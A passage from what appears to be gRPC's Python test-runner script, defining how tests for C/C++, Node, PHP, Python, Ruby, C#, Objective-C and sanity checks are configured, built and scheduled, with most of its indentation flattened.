name, config_vars.shell + config_vars.builder +
config_vars.builder_prefix_arguments +
[_pypy_pattern_function(major=major)] + [name] +
config_vars.venv_relative_python + config_vars.toolchain,
config_vars.shell + config_vars.runner +
[os.path.join(name, config_vars.venv_relative_python[0])])
def _python_pattern_function(major, minor, bits):
# Bit-ness is handled by the test machine's environment
if os.name == "nt":
if bits == "64":
return '/c/Python{major}{minor}/python.exe'.format(major=major,
minor=minor,
bits=bits)
else:
return '/c/Python{major}{minor}_{bits}bits/python.exe'.format(
major=major, minor=minor, bits=bits)
else:
return 'python{major}.{minor}'.format(major=major, minor=minor)
def _pypy_pattern_function(major):
if major == '2':
return 'pypy'
elif major == '3':
return 'pypy3'
else:
raise ValueError("Unknown PyPy major version")
class CLanguage(object):
def __init__(self, make_target, test_lang):
self.make_target = make_target
self.platform = platform_string()
self.test_lang = test_lang
def configure(self, config, args):
self.config = config
self.args = args
self._make_options = []
self._use_cmake = True
if self.platform == 'windows':
_check_compiler(self.args.compiler, [
'default', 'cmake', 'cmake_vs2015', 'cmake_vs2017',
'cmake_vs2019'
])
_check_arch(self.args.arch, ['default', 'x64', 'x86'])
if self.args.compiler == 'cmake_vs2019':
cmake_generator_option = 'Visual Studio 16 2019'
elif self.args.compiler == 'cmake_vs2017':
cmake_generator_option = 'Visual Studio 15 2017'
else:
cmake_generator_option = 'Visual Studio 14 2015'
cmake_arch_option = 'x64' if self.args.arch == 'x64' else 'Win32'
self._cmake_configure_extra_args = [
'-G', cmake_generator_option, '-A', cmake_arch_option
]
else:
if self.platform == 'linux':
# Allow all the known architectures. _check_arch_option has already checked that we're not doing
# something illegal when not running under docker.
_check_arch(self.args.arch, ['default', 'x64', 'x86'])
else:
_check_arch(self.args.arch, ['default'])
self._docker_distro, self._cmake_configure_extra_args = self._compiler_options(
self.args.use_docker, self.args.compiler)
if self.args.arch == 'x86':
# disable boringssl asm optimizations when on x86
# see https://github.com/grpc/grpc/blob/b5b8578b3f8b4a9ce61ed6677e19d546e43c5c68/tools/run_tests/artifacts/artifact_targets.py#L253
self._cmake_configure_extra_args.append('-DOPENSSL_NO_ASM=ON')
if args.iomgr_platform == "uv":
cflags = '-DGRPC_UV -DGRPC_CUSTOM_IOMGR_THREAD_CHECK -DGRPC_CUSTOM_SOCKET '
try:
cflags += subprocess.check_output(
['pkg-config', '--cflags', 'libuv']).strip() + ' '
except (subprocess.CalledProcessError, OSError):
pass
try:
ldflags = subprocess.check_output(
['pkg-config', '--libs', 'libuv']).strip() + ' '
except (subprocess.CalledProcessError, OSError):
ldflags = '-luv '
self._make_options += [
'EXTRA_CPPFLAGS={}'.format(cflags),
'EXTRA_LDLIBS={}'.format(ldflags)
]
def test_specs(self):
out = []
binaries = get_c_tests(self.args.travis, self.test_lang)
for target in binaries:
if self._use_cmake and target.get('boringssl', False):
# cmake doesn't build boringssl tests
continue
auto_timeout_scaling = target.get('auto_timeout_scaling', True)
polling_strategies = (_POLLING_STRATEGIES.get(
self.platform, ['all']) if target.get('uses_polling', True) else
['none'])
if self.args.iomgr_platform == 'uv':
polling_strategies = ['all']
for polling_strategy in polling_strategies:
env = {
'GRPC_DEFAULT_SSL_ROOTS_FILE_PATH':
_ROOT + '/src/core/tsi/test_creds/ca.pem',
'GRPC_POLL_STRATEGY':
polling_strategy,
'GRPC_VERBOSITY':
'DEBUG'
}
resolver = os.environ.get('GRPC_DNS_RESOLVER', None)
if resolver:
env['GRPC_DNS_RESOLVER'] = resolver
shortname_ext = '' if polling_strategy == 'all' else ' GRPC_POLL_STRATEGY=%s' % polling_strategy
if polling_strategy in target.get('excluded_poll_engines', []):
continue
timeout_scaling = 1
if auto_timeout_scaling:
config = self.args.config
if ('asan' in config or config == 'msan' or
config == 'tsan' or config == 'ubsan' or
config == 'helgrind' or config == 'memcheck'):
# Scale overall test timeout if running under various sanitizers.
# scaling value is based on historical data analysis
timeout_scaling *= 3
if self.config.build_config in target['exclude_configs']:
continue
if self.args.iomgr_platform in target.get('exclude_iomgrs', []):
continue
if self.platform == 'windows':
binary = 'cmake/build/%s/%s.exe' % (_MSBUILD_CONFIG[
self.config.build_config], target['name'])
else:
if self._use_cmake:
binary = 'cmake/build/%s' % target['name']
else:
binary = 'bins/%s/%s' % (self.config.build_config,
target['name'])
cpu_cost = target['cpu_cost']
if cpu_cost == 'capacity':
cpu_cost = multiprocessing.cpu_count()
if os.path.isfile(binary):
list_test_command = None
filter_test_command = None
                    # these are the flags defined by the gtest and benchmark frameworks to list
# and filter test runs. We use them to split each individual test
# into its own JobSpec, and thus into its own process.
if 'benchmark' in target and target['benchmark']:
with open(os.devnull, 'w') as fnull:
tests = subprocess.check_output(
[binary, '--benchmark_list_tests'],
stderr=fnull)
for line in tests.split('\n'):
test = line.strip()
if not test: continue
cmdline = [binary,
'--benchmark_filter=%s$' % test
] + target['args']
out.append(
self.config.job_spec(
cmdline,
shortname='%s %s' %
(' '.join(cmdline), shortname_ext),
cpu_cost=cpu_cost,
timeout_seconds=target.get(
'timeout_seconds',
_DEFAULT_TIMEOUT_SECONDS) *
timeout_scaling,
environ=env))
elif 'gtest' in target and target['gtest']:
# here we parse the output of --gtest_list_tests to build up a complete
                        # list of the tests contained in a binary. For each test, we then
# add a job to run, filtering for just that test.
with open(os.devnull, 'w') as fnull:
tests = subprocess.check_output(
[binary, '--gtest_list_tests'], stderr=fnull)
base = None
for line in tests.split('\n'):
i = line.find('#')
if i >= 0: line = line[:i]
if not line: continue
if line[0] != ' ':
base = line.strip()
else:
assert base is not None
assert line[1] == ' '
test = base + line.strip()
cmdline = [binary,
'--gtest_filter=%s' % test
] + target['args']
out.append(
self.config.job_spec(
cmdline,
shortname='%s %s' %
(' '.join(cmdline), shortname_ext),
cpu_cost=cpu_cost,
timeout_seconds=target.get(
'timeout_seconds',
_DEFAULT_TIMEOUT_SECONDS) *
timeout_scaling,
environ=env))
else:
cmdline = [binary] + target['args']
shortname = target.get(
'shortname',
' '.join(pipes.quote(arg) for arg in cmdline))
shortname += shortname_ext
out.append(
self.config.job_spec(
cmdline,
shortname=shortname,
cpu_cost=cpu_cost,
flaky=target.get('flaky', False),
timeout_seconds=target.get(
'timeout_seconds',
_DEFAULT_TIMEOUT_SECONDS) * timeout_scaling,
environ=env))
elif self.args.regex == '.*' or self.platform == 'windows':
print('\nWARNING: binary not found, skipping', binary)
return sorted(out)
def make_targets(self):
if self.platform == 'windows':
# don't build tools on windows just yet
return ['buildtests_%s' % self.make_target]
return [
'buildtests_%s' % self.make_target,
'tools_%s' % self.make_target, 'check_epollexclusive'
]
def make_options(self):
return self._make_options
def pre_build_steps(self):
if self.platform == 'windows':
return [['tools\\run_tests\\helper_scripts\\pre_build_cmake.bat'] +
self._cmake_configure_extra_args]
elif self._use_cmake:
return [['tools/run_tests/helper_scripts/pre_build_cmake.sh'] +
self._cmake_configure_extra_args]
else:
return []
def build_steps(self):
return []
def post_tests_steps(self):
if self.platform == 'windows':
return []
else:
return [['tools/run_tests/helper_scripts/post_tests_c.sh']]
def makefile_name(self):
if self._use_cmake:
return 'cmake/build/Makefile'
else:
return 'Makefile'
def _clang_cmake_configure_extra_args(self, version_suffix=''):
return [
'-DCMAKE_C_COMPILER=clang%s' % version_suffix,
'-DCMAKE_CXX_COMPILER=clang++%s' % version_suffix,
]
def _compiler_options(self, use_docker, compiler):
"""Returns docker distro and cmake configure args to use for given compiler."""
if not use_docker and not _is_use_docker_child():
# if not running under docker, we cannot ensure the right compiler version will be used,
# so we only allow the non-specific choices.
_check_compiler(compiler, ['default', 'cmake'])
if compiler == 'gcc4.9' or compiler == 'default' or compiler == 'cmake':
return ('jessie', [])
elif compiler == 'gcc5.3':
return ('ubuntu1604', [])
elif compiler == 'gcc7.4':
return ('ubuntu1804', [])
elif compiler == 'gcc8.3':
return ('buster', [])
elif compiler == 'gcc_musl':
return ('alpine', [])
elif compiler == 'clang3.6':
return ('ubuntu1604',
self._clang_cmake_configure_extra_args(
version_suffix='-3.6'))
elif compiler == 'clang3.7':
return ('ubuntu1604',
self._clang_cmake_configure_extra_args(
version_suffix='-3.7'))
else:
raise Exception('Compiler %s not supported.' % compiler)
def dockerfile_dir(self):
return 'tools/dockerfile/test/cxx_%s_%s' % (
self._docker_distro, _docker_arch_suffix(self.args.arch))
def __str__(self):
return self.make_target
# This tests Node on grpc/grpc-node and will become the standard for Node testing
class RemoteNodeLanguage(object):
def __init__(self):
self.platform = platform_string()
def configure(self, config, args):
self.config = config
self.args = args
# Note: electron ABI only depends on major and minor version, so that's all
# we should specify in the compiler argument
_check_compiler(self.args.compiler, [
'default', 'node0.12', 'node4', 'node5', 'node6', 'node7', 'node8',
'electron1.3', 'electron1.6'
])
if self.args.compiler == 'default':
self.runtime = 'node'
self.node_version = '8'
else:
if self.args.compiler.startswith('electron'):
self.runtime = 'electron'
self.node_version = self.args.compiler[8:]
else:
self.runtime = 'node'
# Take off the word "node"
self.node_version = self.args.compiler[4:]
# TODO: update with Windows/electron scripts when available for grpc/grpc-node
def test_specs(self):
if self.platform == 'windows':
return [
self.config.job_spec(
['tools\\run_tests\\helper_scripts\\run_node.bat'])
]
else:
return [
self.config.job_spec(
['tools/run_tests/helper_scripts/run_grpc-node.sh'],
None,
environ=_FORCE_ENVIRON_FOR_WRAPPERS)
]
def pre_build_steps(self):
return []
def make_targets(self):
return []
def make_options(self):
return []
def build_steps(self):
return []
def post_tests_steps(self):
return []
def makefile_name(self):
return 'Makefile'
def dockerfile_dir(self):
return 'tools/dockerfile/test/node_jessie_%s' % _docker_arch_suffix(
self.args.arch)
def __str__(self):
return 'grpc-node'
class PhpLanguage(object):
def configure(self, config, args):
self.config = config
self.args = args
_check_compiler(self.args.compiler, ['default'])
self._make_options = ['EMBED_OPENSSL=true', 'EMBED_ZLIB=true']
def test_specs(self):
return [
self.config.job_spec(['src/php/bin/run_tests.sh'],
environ=_FORCE_ENVIRON_FOR_WRAPPERS)
]
def pre_build_steps(self):
return []
def make_targets(self):
return ['static_c', 'shared_c']
def make_options(self):
return self._make_options
def build_steps(self):
return [['tools/run_tests/helper_scripts/build_php.sh']]
def post_tests_steps(self):
return [['tools/run_tests/helper_scripts/post_tests_php.sh']]
def makefile_name(self):
return 'Makefile'
def dockerfile_dir(self):
return 'tools/dockerfile/test/php_jessie_%s' % _docker_arch_suffix(
self.args.arch)
def __str__(self):
return 'php'
class Php7Language(object):
def configure(self, config, args):
self.config = config
self.args = args
_check_compiler(self.args.compiler, ['default'])
self._make_options = ['EMBED_OPENSSL=true', 'EMBED_ZLIB=true']
def test_specs(self):
return [
self.config.job_spec(['src/php/bin/run_tests.sh'],
environ=_FORCE_ENVIRON_FOR_WRAPPERS)
]
def pre_build_steps(self):
return []
def make_targets(self):
return ['static_c', 'shared_c']
def make_options(self):
return self._make_options
def build_steps(self):
return [['tools/run_tests/helper_scripts/build_php.sh']]
def post_tests_steps(self):
return [['tools/run_tests/helper_scripts/post_tests_php.sh']]
def makefile_name(self):
return 'Makefile'
def dockerfile_dir(self):
return 'tools/dockerfile/test/php7_jessie_%s' % _docker_arch_suffix(
self.args.arch)
def __str__(self):
return 'php7'
class PythonConfig(
collections.namedtuple('PythonConfig', ['name', 'build', 'run'])):
"""Tuple of commands (named s.t. 'what it says on the tin' applies)"""
class PythonLanguage(object):
_TEST_SPECS_FILE = {
'native': 'src/python/grpcio_tests/tests/tests.json',
'gevent': 'src/python/grpcio_tests/tests/tests.json',
'asyncio': 'src/python/grpcio_tests/tests_aio/tests.json',
}
_TEST_FOLDER = {
'native': 'test',
'gevent': 'test',
'asyncio': 'test_aio',
}
def configure(self, config, args):
self.config = config
self.args = args
self.pythons = self._get_pythons(self.args)
def test_specs(self):
# load list of known test suites
with open(self._TEST_SPECS_FILE[
self.args.iomgr_platform]) as tests_json_file:
tests_json = json.load(tests_json_file)
environment = dict(_FORCE_ENVIRON_FOR_WRAPPERS)
# TODO(https://github.com/grpc/grpc/issues/21401) Fork handlers is not
# designed for non-native IO manager. It has a side-effect that
# overrides threading settings in C-Core.
if args.iomgr_platform != 'native':
environment['GRPC_ENABLE_FORK_SUPPORT'] = '0'
return [
self.config.job_spec(
config.run,
timeout_seconds=5 * 60,
environ=dict(GRPC_PYTHON_TESTRUNNER_FILTER=str(suite_name),
**environment),
shortname='%s.%s.%s' %
(config.name, self._TEST_FOLDER[self.args.iomgr_platform],
suite_name),
) for suite_name in tests_json for config in self.pythons
]
def pre_build_steps(self):
return []
def make_targets(self):
return []
def make_options(self):
return []
def build_steps(self):
return [config.build for config in self.pythons]
def post_tests_steps(self):
if self.config.build_config != 'gcov':
return []
else:
return [['tools/run_tests/helper_scripts/post_tests_python.sh']]
def makefile_name(self):
return 'Makefile'
def dockerfile_dir(self):
return 'tools/dockerfile/test/python_%s_%s' % (
self._python_manager_name(), _docker_arch_suffix(self.args.arch))
def _python_manager_name(self):
"""Choose the docker image to use based on python version."""
if self.args.compiler in [
'python2.7', 'python3.5', 'python3.6', 'python3.7', 'python3.8'
]:
return 'stretch_' + self.args.compiler[len('python'):]
elif self.args.compiler == 'python_alpine':
return 'alpine'
else:
return 'stretch_default'
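    # e.g. compiler 'python3.7'  -> docker dir suffix 'stretch_3.7',
    #      'python_alpine'       -> 'alpine',
    #      anything else         -> 'stretch_default'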
def _get_pythons(self, args):
"""Get python runtimes to test with, based on current platform, architecture, compiler etc."""
if args.arch == 'x86':
bits = '32'
else:
bits = '64'
if os.name == 'nt':
shell = ['bash']
builder = [
os.path.abspath(
'tools/run_tests/helper_scripts/build_python_msys2.sh')
]
builder_prefix_arguments = ['MINGW{}'.format(bits)]
venv_relative_python = ['Scripts/python.exe']
toolchain = ['mingw32']
else:
shell = []
builder = [
os.path.abspath(
'tools/run_tests/helper_scripts/build_python.sh')
]
builder_prefix_arguments = []
venv_relative_python = ['bin/python']
toolchain = ['unix']
# Selects the corresponding testing mode.
# See src/python/grpcio_tests/commands.py for implementation details.
if args.iomgr_platform == 'native':
test_command = 'test_lite'
elif args.iomgr_platform == 'gevent':
test_command = 'test_gevent'
elif args.iomgr_platform == 'asyncio':
test_command = 'test_aio'
else:
raise ValueError('Unsupported IO Manager platform: %s' %
args.iomgr_platform)
runner = [
os.path.abspath('tools/run_tests/helper_scripts/run_python.sh')
]
config_vars = _PythonConfigVars(shell, builder,
builder_prefix_arguments,
venv_relative_python, toolchain, runner,
test_command, args.iomgr_platform)
python27_config = _python_config_generator(name='py27',
major='2',
minor='7',
bits=bits,
config_vars=config_vars)
python35_config = _python_config_generator(name='py35',
major='3',
minor='5',
bits=bits,
config_vars=config_vars)
python36_config = _python_config_generator(name='py36',
major='3',
minor='6',
bits=bits,
config_vars=config_vars)
python37_config = _python_config_generator(name='py37',
major='3',
minor='7',
bits=bits,
config_vars=config_vars)
python38_config = _python_config_generator(name='py38',
major='3',
minor='8',
bits=bits,
config_vars=config_vars)
pypy27_config = _pypy_config_generator(name='pypy',
major='2',
config_vars=config_vars)
pypy32_config = _pypy_config_generator(name='pypy3',
major='3',
config_vars=config_vars)
if args.iomgr_platform == 'asyncio':
if args.compiler not in ('default', 'python3.6', 'python3.7',
'python3.8'):
raise Exception(
'Compiler %s not supported with IO Manager platform: %s' %
(args.compiler, args.iomgr_platform))
if args.compiler == 'default':
if os.name == 'nt':
if args.iomgr_platform == 'gevent':
# TODO(https://github.com/grpc/grpc/issues/23784) allow
# gevent to run on later version once issue solved.
return (python36_config,)
else:
return (python38_config,)
else:
if args.iomgr_platform == 'asyncio':
return (python36_config, python38_config)
elif os.uname()[0] == 'Darwin':
# NOTE(rbellevi): Testing takes significantly longer on
# MacOS, so we restrict the number of interpreter versions
# tested.
return (
python27_config,
python38_config,
)
else:
return (
python27_config,
python35_config,
python37_config,
python38_config,
)
elif args.compiler == 'python2.7':
return (python27_config,)
elif args.compiler == 'python3.5':
return (python35_config,)
elif args.compiler == 'python3.6':
return (python36_config,)
elif args.compiler == 'python3.7':
return (python37_config,)
elif args.compiler == 'python3.8':
return (python38_config,)
elif args.compiler == 'pypy':
return (pypy27_config,)
elif args.compiler == 'pypy3':
return (pypy32_config,)
elif args.compiler == 'python_alpine':
return (python27_config,)
elif args.compiler == 'all_the_cpythons':
return (
python27_config,
python35_config,
python36_config,
python37_config,
python38_config,
)
else:
raise Exception('Compiler %s not supported.' % args.compiler)
def __str__(self):
return 'python'
class RubyLanguage(object):
def configure(self, config, args):
self.config = config
self.args = args
_check_compiler(self.args.compiler, ['default'])
def test_specs(self):
tests = [
self.config.job_spec(['tools/run_tests/helper_scripts/run_ruby.sh'],
timeout_seconds=10 * 60,
environ=_FORCE_ENVIRON_FOR_WRAPPERS)
]
for test in [
'src/ruby/end2end/sig_handling_test.rb',
'src/ruby/end2end/channel_state_test.rb',
'src/ruby/end2end/channel_closing_test.rb',
'src/ruby/end2end/sig_int_during_channel_watch_test.rb',
'src/ruby/end2end/killed_client_thread_test.rb',
'src/ruby/end2end/forking_client_test.rb',
'src/ruby/end2end/grpc_class_init_test.rb',
'src/ruby/end2end/multiple_killed_watching_threads_test.rb',
'src/ruby/end2end/load_grpc_with_gc_stress_test.rb',
'src/ruby/end2end/client_memory_usage_test.rb',
'src/ruby/end2end/package_with_underscore_test.rb',
'src/ruby/end2end/graceful_sig_handling_test.rb',
'src/ruby/end2end/graceful_sig_stop_test.rb',
'src/ruby/end2end/errors_load_before_grpc_lib_test.rb',
'src/ruby/end2end/logger_load_before_grpc_lib_test.rb',
'src/ruby/end2end/status_codes_load_before_grpc_lib_test.rb',
'src/ruby/end2end/call_credentials_timeout_test.rb',
'src/ruby/end2end/call_credentials_returning_bad_metadata_doesnt_kill_background_thread_test.rb'
]:
tests.append(
self.config.job_spec(['ruby', test],
shortname=test,
timeout_seconds=20 * 60,
environ=_FORCE_ENVIRON_FOR_WRAPPERS))
return tests
def pre_build_steps(self):
return [['tools/run_tests/helper_scripts/pre_build_ruby.sh']]
def make_targets(self):
return []
def make_options(self):
return []
def build_steps(self):
return [['tools/run_tests/helper_scripts/build_ruby.sh']]
def post_tests_steps(self):
return [['tools/run_tests/helper_scripts/post_tests_ruby.sh']]
def makefile_name(self):
return 'Makefile'
def dockerfile_dir(self):
return 'tools/dockerfile/test/ruby_jessie_%s' % _docker_arch_suffix(
self.args.arch)
def __str__(self):
return 'ruby'
class CSharpLanguage(object):
def __init__(self):
self.platform = platform_string()
def configure(self, config, args):
self.config = config
self.args = args
if self.platform == 'windows':
_check_compiler(self.args.compiler, ['default', 'coreclr'])
_check_arch(self.args.arch, ['default'])
self._cmake_arch_option = 'x64'
else:
_check_compiler(self.args.compiler, ['default', 'coreclr'])
self._docker_distro = 'stretch'
def test_specs(self):
with open('src/csharp/tests.json') as f:
tests_by_assembly = json.load(f)
msbuild_config = _MSBUILD_CONFIG[self.config.build_config]
nunit_args = ['--labels=All', '--noresult', '--workers=1']
assembly_subdir = 'bin/%s' % msbuild_config
assembly_extension = '.exe'
if self.args.compiler == 'coreclr':
assembly_subdir += '/netcoreapp2.1'
runtime_cmd = ['dotnet', 'exec']
assembly_extension = '.dll'
else:
assembly_subdir += '/net45'
if self.platform == 'windows':
runtime_cmd = []
elif self.platform == 'mac':
# mono before version 5.2 on MacOS defaults to 32bit runtime
runtime_cmd = ['mono', '--arch=64']
else:
runtime_cmd = ['mono']
specs = []
for assembly in six.iterkeys(tests_by_assembly):
assembly_file = 'src/csharp/%s/%s/%s%s' % (
assembly, assembly_subdir, assembly, assembly_extension)
if self.config.build_config != 'gcov' or self.platform != 'windows':
# normally, run each test as a separate process
for test in tests_by_assembly[assembly]:
cmdline = runtime_cmd + [assembly_file,
'--test=%s' % test] + nunit_args
specs.append(
self.config.job_spec(
cmdline,
shortname='csharp.%s' % test,
environ=_FORCE_ENVIRON_FOR_WRAPPERS))
else:
# For C# test coverage, run all tests from the same assembly at once
# using OpenCover.Console (only works on Windows).
cmdline = [
'src\\csharp\\packages\\OpenCover.4.6.519\\tools\\OpenCover.Console.exe',
'-target:%s' % assembly_file, '-targetdir:src\\csharp',
'-targetargs:%s' % ' '.join(nunit_args),
'-filter:+[Grpc.Core]*', '-register:user',
'-output:src\\csharp\\coverage_csharp_%s.xml' % assembly
]
# set really high cpu_cost to make sure instances of OpenCover.Console run exclusively
# to prevent problems with registering the profiler.
run_exclusive = 1000000
specs.append(
self.config.job_spec(cmdline,
shortname='csharp.coverage.%s' %
assembly,
cpu_cost=run_exclusive,
environ=_FORCE_ENVIRON_FOR_WRAPPERS))
return specs
def pre_build_steps(self):
if self.platform == 'windows':
return [[
'tools\\run_tests\\helper_scripts\\pre_build_csharp.bat',
self._cmake_arch_option
]]
else:
return [['tools/run_tests/helper_scripts/pre_build_csharp.sh']]
def make_targets(self):
return ['grpc_csharp_ext']
def make_options(self):
return []
def build_steps(self):
if self.platform == 'windows':
return [['tools\\run_tests\\helper_scripts\\build_csharp.bat']]
else:
return [['tools/run_tests/helper_scripts/build_csharp.sh']]
def post_tests_steps(self):
if self.platform == 'windows':
return [['tools\\run_tests\\helper_scripts\\post_tests_csharp.bat']]
else:
return [['tools/run_tests/helper_scripts/post_tests_csharp.sh']]
def makefile_name(self):
if self.platform == 'windows':
return 'cmake/build/%s/Makefile' % self._cmake_arch_option
else:
# no need to set x86 specific flags as run_tests.py
# currently forbids x86 C# builds on both Linux and MacOS.
return 'cmake/build/Makefile'
def dockerfile_dir(self):
return 'tools/dockerfile/test/csharp_%s_%s' % (
self._docker_distro, _docker_arch_suffix(self.args.arch))
def __str__(self):
return 'csharp'
class ObjCLanguage(object):
def configure(self, config, args):
self.config = config
self.args = args
_check_compiler(self.args.compiler, ['default'])
def test_specs(self):
out = []
out.append(
self.config.job_spec(
['src/objective-c/tests/build_one_example_bazel.sh'],
timeout_seconds=10 * 60,
shortname='ios-buildtest-example-sample',
cpu_cost=1e6,
environ={
'SCHEME': 'Sample',
'EXAMPLE_PATH': 'src/objective-c/examples/Sample',
'FRAMEWORKS': 'NO'
}))
# Currently not supporting compiling as frameworks in Bazel
out.append(
self.config.job_spec(
['src/objective-c/tests/build_one_example.sh'],
timeout_seconds=20 * 60,
shortname='ios-buildtest-example-sample-frameworks',
cpu_cost=1e6,
environ={
'SCHEME': 'Sample',
'EXAMPLE_PATH': 'src/objective-c/examples/Sample',
'FRAMEWORKS': 'YES'
}))
out.append(
self.config.job_spec(
['src/objective-c/tests/build_one_example.sh'],
timeout_seconds=20 * 60,
shortname='ios-buildtest-example-switftsample',
cpu_cost=1e6,
environ={
'SCHEME': 'SwiftSample',
'EXAMPLE_PATH': 'src/objective-c/examples/SwiftSample'
}))
out.append(
self.config.job_spec(
['src/objective-c/tests/build_one_example_bazel.sh'],
timeout_seconds=10 * 60,
shortname='ios-buildtest-example-tvOS-sample',
cpu_cost=1e6,
environ={
'SCHEME': 'tvOS-sample',
'EXAMPLE_PATH': 'src/objective-c/examples/tvOS-sample',
'FRAMEWORKS': 'NO'
}))
# Disabled due to #20258
# TODO (mxyan): Reenable this test when #20258 is resolved.
# out.append(
# self.config.job_spec(
# ['src/objective-c/tests/build_one_example_bazel.sh'],
# timeout_seconds=20 * 60,
# shortname='ios-buildtest-example-watchOS-sample',
# cpu_cost=1e6,
# environ={
# 'SCHEME': 'watchOS-sample-WatchKit-App',
# 'EXAMPLE_PATH': 'src/objective-c/examples/watchOS-sample',
# 'FRAMEWORKS': 'NO'
# }))
out.append(
self.config.job_spec(['src/objective-c/tests/run_plugin_tests.sh'],
timeout_seconds=60 * 60,
shortname='ios-test-plugintest',
cpu_cost=1e6,
environ=_FORCE_ENVIRON_FOR_WRAPPERS))
out.append(
self.config.job_spec(
['src/objective-c/tests/run_plugin_option_tests.sh'],
timeout_seconds=60 * 60,
shortname='ios-test-plugin-option-test',
cpu_cost=1e6,
environ=_FORCE_ENVIRON_FOR_WRAPPERS))
out.append(
self.config.job_spec(
['test/core/iomgr/ios/CFStreamTests/build_and_run_tests.sh'],
timeout_seconds=20 * 60,
shortname='ios-test-cfstream-tests',
cpu_cost=1e6,
environ=_FORCE_ENVIRON_FOR_WRAPPERS))
# TODO: replace with run_one_test_bazel.sh when Bazel-Xcode is stable
out.append(
self.config.job_spec(['src/objective-c/tests/run_one_test.sh'],
timeout_seconds=60 * 60,
shortname='ios-test-unittests',
cpu_cost=1e6,
environ={'SCHEME': 'UnitTests'}))
out.append(
self.config.job_spec(['src/objective-c/tests/run_one_test.sh'],
timeout_seconds=60 * 60,
shortname='ios-test-interoptests',
cpu_cost=1e6,
environ={'SCHEME': 'InteropTests'}))
out.append(
self.config.job_spec(['src/objective-c/tests/run_one_test.sh'],
timeout_seconds=60 * 60,
shortname='ios-test-cronettests',
cpu_cost=1e6,
environ={'SCHEME': 'CronetTests'}))
out.append(
self.config.job_spec(['src/objective-c/tests/run_one_test.sh'],
timeout_seconds=30 * 60,
shortname='ios-perf-test',
cpu_cost=1e6,
environ={'SCHEME': 'PerfTests'}))
out.append(
self.config.job_spec(['src/objective-c/tests/run_one_test.sh'],
timeout_seconds=30 * 60,
shortname='ios-perf-test-posix',
cpu_cost=1e6,
environ={'SCHEME': 'PerfTestsPosix'}))
out.append(
self.config.job_spec(['test/cpp/ios/build_and_run_tests.sh'],
timeout_seconds=30 * 60,
shortname='ios-cpp-test-cronet',
cpu_cost=1e6,
environ=_FORCE_ENVIRON_FOR_WRAPPERS))
out.append(
self.config.job_spec(['src/objective-c/tests/run_one_test.sh'],
timeout_seconds=60 * 60,
shortname='mac-test-basictests',
cpu_cost=1e6,
environ={
'SCHEME': 'MacTests',
'PLATFORM': 'macos'
}))
out.append(
self.config.job_spec(['src/objective-c/tests/run_one_test.sh'],
timeout_seconds=30 * 60,
shortname='tvos-test-basictests',
cpu_cost=1e6,
environ={
'SCHEME': 'TvTests',
'PLATFORM': 'tvos'
}))
return sorted(out)
def pre_build_steps(self):
return []
def make_targets(self):
return []
def make_options(self):
return []
def build_steps(self):
return []
def post_tests_steps(self):
return []
def makefile_name(self):
return 'Makefile'
def dockerfile_dir(self):
return None
def __str__(self):
return 'objc'
class Sanity(object):
def configure(self, config, args):
self.config = config
self.args = args
_check_compiler(self.args.compiler, ['default'])
def test_specs(self):
import yaml
with open('tools/run_tests/sanity/sanity_tests.yaml', 'r') as f:
environ = {'TEST': 'true'}
if _is_use_docker_child():
environ['CLANG_FORMAT_SKIP_DOCKER'] = 'true'
environ['CLANG_TIDY_SKIP_DOCKER'] = 'true'
# sanity tests run tools/bazel wrapper concurrently
# and that can result in a download/run race in the wrapper.
# under docker we already have the right version of bazel
# so we can just disable the wrapper.
environ['DISABLE_BAZEL_WRAPPER'] = 'true'
return [
self.config.job_spec(cmd['script'].split(),
timeout_seconds=30 * 60,
environ=environ,
cpu_cost=cmd.get('cpu_cost', 1))
for cmd in yaml.load(f)
]
def pre_build_steps(self):
return []
def make_targets(self):
return ['run_dep_checks']
def make_options(self):
return []
def build_steps(self):
return []
def post_tests_steps(self):
return []
def makefile_name(self):
return 'Makefile'
def dockerfile_dir(self):
return 'tools/dockerfile/test/sanity'
def __str__(self):
return 'sanity'
# different configurations we can run under
with open('tools/run_tests/generated/configs.json') as f:
_CONFIGS = dict(
(cfg['config'], Config(**cfg)) for cfg in ast.literal_eval(f.read()))
_LANGUAGES = {
'c++': CLanguage('cxx', 'c++'),
'c': CLanguage('c', 'c'),
'grpc-node': RemoteNodeLanguage(),
'php': PhpLanguage(),
'php7': Php7Language(),
'python': PythonLanguage(),
'ruby': RubyLanguage(),
'csharp': CSharpLanguage(),
'objc': ObjCLanguage(),
'sanity': Sanity()
}
_MSBUILD_CONFIG = {
'dbg': 'Debug',
'opt': 'Release',
'gcov': 'Debug',
}
def _windows_arch_option(arch):
"""Returns msbuild cmdline option for selected architecture."""
if arch == 'default' or arch == 'x86':
return '/p:Platform=Win32'
elif arch == 'x64':
return '/p:Platform=x64'
else:
print('Architecture %s not supported.' % arch)
sys.exit(1)
def _check_arch_option(arch):
"""Checks that architecture option is valid."""
if platform_string() == 'windows':
_windows_arch_option(arch)
elif platform_string() == 'linux':
# On linux, we need to be running under docker with the right architecture.
runtime_arch = platform.architecture()[0]
if arch == 'default':
return
elif runtime_arch == '64bit' and arch == 'x64':
return
elif runtime_arch == '32bit' and arch == 'x86':
return
else:
print(
'Architecture %s does not match current runtime architecture.' %
arch)
sys.exit(1)
else:
if args.arch != 'default':
print('Architecture %s not supported on current platform.' %
args.arch)
sys.exit(1)
def _docker_arch_suffix(arch):
"""Returns suffix to dockerfile dir to use."""
if arch == 'default' or arch == 'x64':
return 'x64'
elif arch == 'x86':
return 'x86'
else:
print('Architecture %s not supported with current settings.' % arch)
sys.exit(1)
def runs_per_test_type(arg_str):
"""Auxiliary function to parse the "runs_per_test" flag.
Returns:
A positive integer or 0, the latter indicating an infinite number of
runs.
Raises:
argparse.ArgumentTypeError: Upon invalid input.
"""
if arg_str == 'inf':
return 0
try:
n = int(arg_str)
if n <= 0: raise ValueError
return n
except:
msg = '\'{}\' is not a positive integer or \'inf\''.format(arg_str)
raise argparse.ArgumentTypeError(msg)
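# For example: runs_per_test_type('inf') -> 0 (interpreted as "run forever"),
#              runs_per_test_type('3')   -> 3,
#              runs_per_test_type('0')   raises argparse.ArgumentTypeError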
def percent_type(arg_str):
pct = float(arg_str)
if pct > 100 or pct < 0:
raise argparse.ArgumentTypeError(
"'%f' is not a valid percentage in the [0, 100] range" % pct)
return pct
# This is math.isclose in python >= 3.5
def isclose(a, b, rel_tol=1e-09, abs_tol=0.0):
return abs(a - b) <= max(rel_tol * max(abs(a), abs(b)), abs_tol)
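# Used below as isclose(args.sample_percent, 100.0) to detect the default
# "run every test" case without relying on exact float equality.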
# parse command line
argp = argparse.ArgumentParser(description='Run grpc tests.')
argp.add_argument('-c',
